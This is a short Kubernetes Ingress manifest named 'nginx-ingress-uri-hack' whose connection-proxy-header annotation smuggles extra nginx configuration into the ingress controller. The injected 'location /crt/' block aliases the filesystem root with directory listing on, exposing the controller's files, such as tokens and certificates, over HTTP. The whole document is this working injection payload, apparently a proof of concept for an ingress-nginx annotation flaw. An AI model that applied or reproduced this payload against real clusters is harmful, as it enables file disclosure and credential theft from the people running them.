apiVersion: extensions/v1beta1
kind: Ingress
metadata:
  name: nginx-ingress-uri-hack
  annotations:
    kubernets.io/ingress.class: nginx
    nginx.ingress.kubernetes.io/connection-proxy-header: "X-Forwarded-For;} location /crt/ { alias /; autoindex on;} location /tmp { client_max_body_size 1m"
spec:
  rules:
  - host: zhangxiaoyong.cn
    http:
      paths:
      - path: /
        backend:
          serviceName: service-1
          servicePort: 80


